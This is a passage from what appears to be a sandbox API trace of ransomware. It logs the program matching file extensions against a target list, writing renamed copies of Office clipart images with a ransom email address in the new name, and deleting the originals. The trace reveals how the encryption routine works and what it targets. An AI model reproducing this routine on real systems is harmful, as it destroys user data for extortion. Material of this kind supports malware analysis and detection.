Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG") returned 68 [0069.265] lstrlenW (lpString=".dbf") returned 4 [0069.265] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG") returned 68 [0069.265] lstrlenW (lpString=".1cd") returned 4 [0069.265] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG") returned 68 [0069.265] lstrlenW (lpString=".jpg") returned 4 [0069.265] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.265] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.265] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099154.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0069.266] GetLastError () returned 0x0 [0069.266] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1b11, lpOverlapped=0x0) returned 1 [0069.272] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1b20, lpOverlapped=0x0) returned 1 [0069.272] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.273] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.273] SetEndOfFile (hFile=0x370) returned 1 [0069.273] CloseHandle (hObject=0x370) returned 1 [0069.273] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.273] SetEndOfFile (hFile=0x340) returned 1 [0069.274] CloseHandle (hObject=0x340) returned 1 [0069.274] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.274] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099154.jpg")) returned 1 [0069.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG") returned 68 [0069.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG") returned 68 [0069.274] lstrlenW (lpString=".doc") returned 4 [0069.274] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.274] lstrlenW (lpString=".docx") returned 5 [0069.274] lstrcmpiW (lpString1=".docx", lpString2="4.JPG") returned -1 [0069.274] lstrlenW (lpString=".pdf") returned 4 [0069.274] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.274] lstrlenW (lpString=".xls") returned 4 [0069.274] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.275] lstrlenW (lpString=".xlsx") returned 5 [0069.275] lstrcmpiW (lpString1=".xlsx", lpString2="4.JPG") returned -1 [0069.275] lstrlenW (lpString=".ppt") returned 4 [0069.275] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG") returned 68 [0069.275] lstrlenW (lpString=".zip") returned 4 [0069.275] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.275] lstrlenW (lpString=".rar") returned 4 [0069.275] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.275] lstrlenW (lpString=".bz2") returned 4 [0069.275] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.275] lstrlenW (lpString=".7z") returned 3 [0069.275] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG") returned 68 [0069.275] lstrlenW (lpString=".dbf") returned 4 [0069.275] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG") returned 68 [0069.275] lstrlenW (lpString=".1cd") returned 4 [0069.275] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG") returned 68 [0069.275] lstrlenW (lpString=".jpg") returned 4 [0069.275] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.275] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.275] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099156.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0069.276] GetLastError () returned 0x0 [0069.276] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x3682, lpOverlapped=0x0) returned 1 [0069.277] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x3690, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x3690, lpOverlapped=0x0) returned 1 [0069.278] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.278] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.278] SetEndOfFile (hFile=0x370) returned 1 [0069.278] CloseHandle (hObject=0x370) returned 1 [0069.279] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.279] SetEndOfFile (hFile=0x340) returned 1 [0069.279] CloseHandle (hObject=0x340) returned 1 [0069.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.280] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099156.jpg")) returned 1 [0069.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG") returned 68 [0069.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG") returned 68 [0069.280] lstrlenW (lpString=".doc") returned 4 [0069.280] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.280] lstrlenW (lpString=".docx") returned 5 [0069.280] lstrcmpiW (lpString1=".docx", lpString2="6.JPG") returned -1 [0069.280] lstrlenW (lpString=".pdf") returned 4 [0069.280] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.280] lstrlenW (lpString=".xls") returned 4 [0069.280] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.280] lstrlenW (lpString=".xlsx") returned 5 [0069.280] lstrcmpiW (lpString1=".xlsx", lpString2="6.JPG") returned -1 [0069.280] lstrlenW (lpString=".ppt") returned 4 [0069.280] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG") returned 68 [0069.280] lstrlenW (lpString=".zip") returned 4 [0069.280] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.280] lstrlenW (lpString=".rar") returned 4 [0069.280] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.280] lstrlenW (lpString=".bz2") returned 4 [0069.280] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.281] lstrlenW (lpString=".7z") returned 3 [0069.281] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG") returned 68 [0069.281] lstrlenW (lpString=".dbf") returned 4 [0069.281] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG") returned 68 [0069.281] lstrlenW (lpString=".1cd") returned 4 [0069.281] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG") returned 68 [0069.281] lstrlenW (lpString=".jpg") returned 4 [0069.281] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.281] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.281] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099157.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0069.282] GetLastError () returned 0x0 [0069.282] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x25c7, lpOverlapped=0x0) returned 1 [0069.702] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x25d0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x25d0, lpOverlapped=0x0) returned 1 [0069.703] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.703] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.703] SetEndOfFile (hFile=0x370) returned 1 [0069.703] CloseHandle (hObject=0x370) returned 1 [0069.703] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.703] SetEndOfFile (hFile=0x340) returned 1 [0069.704] CloseHandle (hObject=0x340) returned 1 [0069.704] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.704] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099157.jpg")) returned 1 [0069.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG") returned 68 [0069.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG") returned 68 [0069.705] lstrlenW (lpString=".doc") returned 4 [0069.705] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.705] lstrlenW (lpString=".docx") returned 5 [0069.705] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1 [0069.705] lstrlenW (lpString=".pdf") returned 4 [0069.705] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.705] lstrlenW (lpString=".xls") returned 4 [0069.705] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.705] lstrlenW (lpString=".xlsx") returned 5 [0069.705] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1 [0069.705] lstrlenW (lpString=".ppt") returned 4 [0069.705] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG") returned 68 [0069.705] lstrlenW (lpString=".zip") returned 4 [0069.705] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.705] lstrlenW (lpString=".rar") returned 4 [0069.705] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.705] lstrlenW (lpString=".bz2") returned 4 [0069.705] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.705] lstrlenW (lpString=".7z") returned 3 [0069.705] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG") returned 68 [0069.705] lstrlenW (lpString=".dbf") returned 4 [0069.706] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG") returned 68 [0069.706] lstrlenW (lpString=".1cd") returned 4 [0069.706] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG") returned 68 [0069.706] lstrlenW (lpString=".jpg") returned 4 [0069.706] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.706] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.706] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099166.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0069.706] GetLastError () returned 0x0 [0069.706] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xfcff, lpOverlapped=0x0) returned 1 [0069.719] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xfd00, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xfd00, lpOverlapped=0x0) returned 1 [0069.721] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.721] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.721] SetEndOfFile (hFile=0x370) returned 1 [0069.721] CloseHandle (hObject=0x370) returned 1 [0069.721] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.721] SetEndOfFile (hFile=0x340) returned 1 [0069.722] CloseHandle (hObject=0x340) returned 1 [0069.722] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.723] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099166.jpg")) returned 1 [0069.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG") returned 68 [0069.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG") returned 68 [0069.723] lstrlenW (lpString=".doc") returned 4 [0069.723] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.723] lstrlenW (lpString=".docx") returned 5 [0069.723] lstrcmpiW (lpString1=".docx", lpString2="6.JPG") returned -1 [0069.723] lstrlenW (lpString=".pdf") returned 4 [0069.723] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.723] lstrlenW (lpString=".xls") returned 4 [0069.723] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.723] lstrlenW (lpString=".xlsx") returned 5 [0069.723] lstrcmpiW (lpString1=".xlsx", lpString2="6.JPG") returned -1 [0069.723] lstrlenW (lpString=".ppt") returned 4 [0069.723] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG") returned 68 [0069.723] lstrlenW (lpString=".zip") returned 4 [0069.724] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.724] lstrlenW (lpString=".rar") returned 4 [0069.724] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.724] lstrlenW (lpString=".bz2") returned 4 [0069.724] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.724] lstrlenW (lpString=".7z") returned 3 [0069.724] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG") returned 68 [0069.724] lstrlenW (lpString=".dbf") returned 4 [0069.724] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG") returned 68 [0069.724] lstrlenW (lpString=".1cd") returned 4 [0069.724] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG") returned 68 [0069.724] lstrlenW (lpString=".jpg") returned 4 [0069.724] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.724] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.724] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099168.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0069.725] GetLastError () returned 0x0 [0069.725] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x4ed3, lpOverlapped=0x0) returned 1 [0069.761] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x4ee0, lpOverlapped=0x0) returned 1 [0069.762] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0069.762] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0069.762] SetEndOfFile (hFile=0x370) returned 1 [0069.763] CloseHandle (hObject=0x370) returned 1 [0069.763] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.763] SetEndOfFile (hFile=0x340) returned 1 [0069.764] CloseHandle (hObject=0x340) returned 1 [0069.764] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.764] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099168.jpg")) returned 1 [0069.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG") returned 68 [0069.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG") returned 68 [0069.765] lstrlenW (lpString=".doc") returned 4 [0069.765] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.765] lstrlenW (lpString=".docx") returned 5 [0069.765] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0069.765] lstrlenW (lpString=".pdf") returned 4 [0069.765] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.765] lstrlenW (lpString=".xls") returned 4 [0069.765] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.765] lstrlenW (lpString=".xlsx") returned 5 [0069.765] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0069.765] lstrlenW (lpString=".ppt") returned 4 [0069.765] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG") returned 68 [0069.765] lstrlenW (lpString=".zip") returned 4 [0069.765] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.765] lstrlenW (lpString=".rar") returned 4 [0069.765] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.765] lstrlenW (lpString=".bz2") returned 4 [0069.765] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.765] lstrlenW (lpString=".7z") returned 3 [0069.765] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG") returned 68 [0069.765] lstrlenW (lpString=".dbf") returned 4 [0069.765] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG") returned 68 [0069.765] lstrlenW (lpString=".1cd") returned 4 [0069.765] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG") returned 68 [0069.765] lstrlenW (lpString=".jpg") returned 4 [0069.765] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.767] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.767] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0069.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099171.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0069.768] GetLastError () returned 0x0 [0069.768] ReadFile (in: hFile=0x36c, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x2232, lpOverlapped=0x0) returned 1 [0069.788] WriteFile (in: hFile=0x308, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x2240, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x2240, lpOverlapped=0x0) returned 1 